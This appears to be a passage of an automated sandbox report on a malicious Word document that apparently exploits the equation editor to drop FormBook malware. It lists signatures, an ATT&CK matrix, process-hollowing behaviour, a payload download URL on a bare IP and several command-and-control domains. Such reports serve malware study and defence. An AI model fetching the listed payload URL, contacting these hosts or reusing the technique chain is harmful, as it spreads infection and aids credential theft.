      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_00964143 GetSystemTime,SystemTimeToFileTime,GetLastError,10_2_00964143
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0095B0AA GetUserNameExW,GetLastError,wcschr,GetComputerNameW,GetLastError,GetLastError,GetLastError,_wcsnicmp,10_2_0095B0AA
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0092395D GetVersionExW,CoInitialize,CoCreateInstance,SysFreeString,CoUninitialize,10_2_0092395D
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.928452620.0000000000410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.429526201.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.928419013.0000000000390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.422078924.0000000003D27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.928452620.0000000000410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.429526201.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.928419013.0000000000390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.422078924.0000000003D27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0095CA2C LocalAlloc,CreateWellKnownSid,GetLastError,RpcBindingSetAuthInfoExW,LocalFree,RpcBindingFree,10_2_0095CA2C
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0095C3D8 memset,GetCurrentProcessId,ProcessIdToSessionId,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,RpcBindingFree,10_2_0095C3D8
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_00960486 RpcStringBindingComposeW,RpcBindingFromStringBindingW,RpcStringFreeW,10_2_00960486
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0096061E RpcBindingSetAuthInfoExW,LocalFree,RpcBindingSetAuthInfoExW,RpcBindingFree,10_2_0096061E

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Native API      		1
      DLL Side-Loading      		1
      Abuse Elevation Control Mechanism      		11
      Disable or Modify Tools      		1
      Credential API Hooking      		1
      System Time Discovery      		Remote Services1
      Archive Collected Data      		15
      Ingress Tool Transfer      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      Shared Modules      		Boot or Logon Initialization Scripts1
      DLL Side-Loading      		1
      Deobfuscate/Decode Files or Information      		LSASS Memory1
      Account Discovery      		Remote Desktop Protocol1
      Screen Capture      		2
      Encrypted Channel      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts33
      Exploitation for Client Execution      		Logon Script (Windows)612
      Process Injection      		1
      Abuse Elevation Control Mechanism      		Security Account Manager2
      File and Directory Discovery      		SMB/Windows Admin Shares1
      Credential API Hooking      		3
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal Accounts1
      Command and Scripting Interpreter      		Login HookLogin Hook4
      Obfuscated Files or Information      		NTDS225
      System Information Discovery      		Distributed Component Object ModelInput Capture123
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Install Root Certificate      		LSA Secrets221
      Security Software Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
      Software Packing      		Cached Domain Credentials2
      Process Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      DLL Side-Loading      		DCSync41
      Virtualization/Sandbox Evasion      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
      Rootkit      		Proc Filesystem11
      Application Window Discovery      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
      Masquerading      		/etc/passwd and /etc/shadow1
      System Owner/User Discovery      		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron41
      Virtualization/Sandbox Evasion      		Network Sniffing1
      Remote System Discovery      		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
      Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd612
      Process Injection      		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1545184 Sample: na.doc Startdate: 30/10/2024 Architecture: WINDOWS Score: 100 45 www.trygenesisx.com 2->45 67 Initial sample is an obfuscated RTF file 2->67 69 Suricata IDS alerts for network traffic 2->69 71 Found malware configuration 2->71 73 17 other signatures 2->73 12 WINWORD.EXE 291 18 2->12         started        signatures3 process4 file5 43 C:\Users\user\Desktop\~$na.doc, data 12->43 dropped 15 EQNEDT32.EXE 11 12->15         started        20 EQNEDT32.EXE 12->20         started        process6 dnsIp7 53 87.120.84.38, 49163, 80 SHARCOM-ASBG Bulgaria 15->53 39 C:\Users\user\AppData\Roaming\ihbgfbin.exe, PE32 15->39 dropped 41 C:\Users\user\...\4q0pGnqqpgTTSL7[1].exe, PE32 15->41 dropped 55 Office equation editor establishes network connection 15->55 57 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 15->57 22 ihbgfbin.exe 3 15->22         started        file8 signatures9 process10 signatures11 75 Machine Learning detection for dropped file 22->75 77 Adds a directory exclusion to Windows Defender 22->77 79 Tries to detect virtualization through RDTSC time measurements 22->79 81 2 other signatures 22->81 25 ihbgfbin.exe 22->25         started        28 powershell.exe 4 22->28         started        process12 signatures13 83 Modifies the context of a thread in another process (thread injection) 25->83 85 Maps a DLL or memory area into another process 25->85 87 Sample uses process hollowing technique 25->87 91 2 other signatures 25->91 30 explorer.exe 1 3 25->30 injected 89 Installs new ROOT certificates 28->89 process14 dnsIp15 47 www.thecareskin.com 30->47 49 www.opmk.monster 30->49 51 9 other IPs or domains 30->51 93 System process connects to network (likely due to code injection or exploit) 30->93 34 mstsc.exe 30->34         started        signatures16 process17 signatures18 59 Modifies the context of a thread in another process (thread injection) 34->59 61 Maps a DLL or memory area into another process 34->61 63 Tries to detect virtualization through RDTSC time measurements 34->63 65 2 other signatures 34->65 37 cmd.exe 34->37         started        process19

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      na.doc39%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882
      na.doc100%AviraHEUR/Rtf.Malformed

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Roaming\ihbgfbin.exe100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\4q0pGnqqpgTTSL7[1].exe100%Joe Sandbox ML

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
      https://support.mozilla.org0%URL Reputationsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      thecareskin.com
      		13.248.213.45
      		truetrue
        		unknown
        fcno30.com
        		68.66.226.117
        		truetrue
          		unknown
          www.education2jobs.com
          		unknown
          		unknowntrue
            		unknown
            www.launchyouglobal.com
            		unknown
            		unknowntrue
              		unknown
              www.thecareskin.com
              		unknown
              		unknowntrue
                		unknown
                www.opmk.monster
                		unknown
                		unknowntrue
                  		unknown
                  www.trygenesisx.com
                  		unknown
                  		unknownfalse
                    		unknown
                    www.mbbwa4wp.cfd
                    		unknown
                    		unknowntrue
                      		unknown
                      www.fcno30.com
                      		unknown
                      		unknowntrue
                        		unknown
                        www.lifeofthobes.uk
                        		unknown
                        		unknowntrue
                          		unknown
                          www.ko-or-a-news.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.affirmationtotebags.com
                            		unknown
                            		unknowntrue
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://87.120.84.38/txt/4q0pGnqqpgTTSL7.exetrue
                                		unknown
                                www.lifeofthobes.uk/btrd/true
                                  		unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://www.gynlkj.comReferer:explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://www.docemimocasamentos.com/btrd/www.solarcyborg.comexplorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://87.120.84.38/txt/4q0pGnqqpgTTSL7.exettC:EQNEDT32.EXE, 00000002.00000002.408279812.00000000008DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://www.docemimocasamentos.comexplorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://www.fcno30.com/btrd/explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                            		unknown
                                            http://www.mbbwa4wp.cfd/btrd/www.fcno30.comexplorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                              		unknown
                                              http://www.thecareskin.com/btrd/www.opmk.monsterexplorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                		unknown
                                                http://www.education2jobs.comReferer:explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://www.martline.website/btrd/www.affirmationtotebags.comexplorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    http://www.ko-or-a-news.comexplorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      http://www.ko-or-a-news.com/btrd/explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        http://www.trygenesisx.com/btrd/explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          http://www.martline.website/btrd/explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            http://www.opmk.monsterReferer:explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              http://www.affirmationtotebags.comexplorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                http://www.mbbwa4wp.cfdReferer:explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  http://www.affirmationtotebags.com/btrd/www.mbbwa4wp.cfdexplorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    http://www.jejeesclothing.com/btrd/www.nashexshop.comexplorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      http://www.gynlkj.com/btrd/explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        http://www.ko-or-a-news.com/btrd/www.launchyouglobal.comexplorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          http://www.autoitscript.com/autoit3explorer.exe, 00000009.00000000.420803319.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.928404044.00000000001D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            http://www.fcno30.comReferer:explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              http://www.opmk.monster/btrd/www.martline.websiteexplorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                http://www.launchyouglobal.com/btrd/explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  http://www.trygenesisx.comexplorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    http://www.solarcyborg.comexplorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      http://www.lifeofthobes.ukexplorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameihbgfbin.exe, 00000005.00000002.421951115.0000000002524000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        http://www.martline.websiteexplorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          http://www.thecareskin.comexplorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            http://www.fcno30.comexplorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              http://www.launchyouglobal.com/btrd/www.trygenesisx.comexplorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                http://www.gynlkj.com/btrd/www.docemimocasamentos.comexplorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  http://www.mbbwa4wp.cfd/btrd/explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    http://www.piriform.com/ccleanerxeexplorer.exe, 00000009.00000002.928878903.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.421597302.000000000260E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      http://www.trygenesisx.comReferer:explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        http://www.ko-or-a-news.comReferer:explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          http://www.jejeesclothing.comReferer:explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            http://www.nashexshop.com/btrd/explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              http://www.opmk.monsterexplorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                http://www.nashexshop.comexplorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  http://www.solarcyborg.com/btrd/explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    http://www.education2jobs.com/btrd/www.lifeofthobes.ukexplorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      http://www.solarcyborg.comReferer:explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        http://www.education2jobs.comexplorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          http://www.mbbwa4wp.cfdexplorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            http://www.education2jobs.com/btrd/explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              http://www.affirmationtotebags.comReferer:explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                		unknown
                                                                                                                                http://www.nashexshop.comReferer:explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  http://www.lifeofthobes.uk/btrd/www.thecareskin.comexplorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    		unknown
                                                                                                                                    http://www.affirmationtotebags.com/btrd/explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      		unknown
                                                                                                                                      http://www.docemimocasamentos.com/btrd/explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        		unknown
                                                                                                                                        http://www.jejeesclothing.comexplorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          		unknown
                                                                                                                                          http://www.solarcyborg.com/btrd/PUSexplorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                            		unknown
                                                                                                                                            http://www.martline.websiteReferer:explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                              		unknown
                                                                                                                                              http://87.120.84.38/txt/4q0pGnqqpgTTSL7.exeC:EQNEDT32.EXE, 00000002.00000002.408279812.00000000008DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		unknown
                                                                                                                                                http://java.sun.comexplorer.exe, 00000009.00000000.420803319.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.928404044.00000000001D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		unknown
                                                                                                                                                  http://www.fcno30.com/btrd/www.ko-or-a-news.comexplorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                    		unknown
                                                                                                                                                    http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000009.00000000.421850492.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.422336388.0000000007524000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.928878903.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.929382715.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.421597302.000000000260E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                      		unknown
                                                                                                                                                      http://www.gynlkj.comexplorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                        		unknown
                                                                                                                                                        http://www.thecareskin.comReferer:explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                          		unknown
                                                                                                                                                          http://www.docemimocasamentos.comReferer:explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                            		unknown
                                                                                                                                                            http://www.launchyouglobal.comexplorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              		unknown
                                                                                                                                                              http://www.thecareskin.com/btrd/explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                		unknown
                                                                                                                                                                http://www.launchyouglobal.comReferer:explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                  		unknown
                                                                                                                                                                  http://www.piriform.com/ccleanerexplorer.exe, 00000009.00000000.421850492.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.422336388.0000000007524000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.928878903.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.929382715.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.421597302.000000000260E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                    		unknown
                                                                                                                                                                    http://87.120.84.38/txt/4q0pGnqqpgTTSL7.exejEQNEDT32.EXE, 00000002.00000002.408279812.00000000008DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		unknown
                                                                                                                                                                      http://www.lifeofthobes.uk/btrd/explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                        		unknown
                                                                                                                                                                        http://www.trygenesisx.com/btrd/www.jejeesclothing.comexplorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                          		unknown
                                                                                                                                                                          https://support.mozilla.orgexplorer.exe, 00000009.00000000.420803319.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.928404044.00000000001D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                          		unknown
                                                                                                                                                                          http://www.nashexshop.com/btrd/www.gynlkj.comexplorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                            		unknown
                                                                                                                                                                            http://www.jejeesclothing.com/btrd/explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                              		unknown
                                                                                                                                                                              http://www.lifeofthobes.ukReferer:explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                		unknown
                                                                                                                                                                                http://www.opmk.monster/btrd/explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		unknown

                                                                                                                                                                                  World Map of Contacted IPs

                                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                                                  Public IPs

                                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                  13.248.213.45
                                                                                                                                                                                  		thecareskin.comUnited States
                                                                                                                                                                                  		16509AMAZON-02UStrue
                                                                                                                                                                                  87.120.84.38
                                                                                                                                                                                  		unknownBulgaria
                                                                                                                                                                                  		51189SHARCOM-ASBGtrue
                                                                                                                                                                                  68.66.226.117
                                                                                                                                                                                  		fcno30.comUnited States
                                                                                                                                                                                  		55293A2HOSTINGUStrue

                                                                                                                                                                                  General Information

                                                                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                  Analysis ID:1545184
                                                                                                                                                                                  Start date and time:2024-10-30 08:36:12 +01:00
                                                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                                                  Overall analysis duration:0h 11m 7s
                                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                                  Report type:full
                                                                                                                                                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                                                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                                                  Number of analysed new started processes analysed:16
                                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                                  Number of injected processes analysed:1
                                                                                                                                                                                  Technologies:
                                                                                                                                                                                  • HCA enabled
                                                                                                                                                                                  • EGA enabled
                                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                                  Sample name:na.doc
                                                                                                                                                                                  Detection:MAL
                                                                                                                                                                                  Classification:mal100.troj.expl.evad.winDOC@13/14@10/3
                                                                                                                                                                                  EGA Information:
                                                                                                                                                                                  • Successful, ratio: 80%
                                                                                                                                                                                  HCA Information:
                                                                                                                                                                                  • Successful, ratio: 99%
                                                                                                                                                                                  • Number of executed functions: 108
                                                                                                                                                                                  • Number of non-executed functions: 257
                                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                                  • Found application associated with file extension: .doc
                                                                                                                                                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                                                  • Attach to Office via COM
                                                                                                                                                                                  • Active ActiveX Object
                                                                                                                                                                                  • Scroll down
                                                                                                                                                                                  • Close Viewer
                                                                                                                                                                                  • Override analysis time to 78467.8162587296 for current running targets taking high CPU consumption
                                                                                                                                                                                  • Override analysis time to 156935.632517459 for current running targets taking high CPU consumption

                                                                                                                                                                                  Warnings

                                                                                                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                                                                                                                                                  • Execution Graph export aborted for target EQNEDT32.EXE, PID 3568 because there are no executed function
                                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                  • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
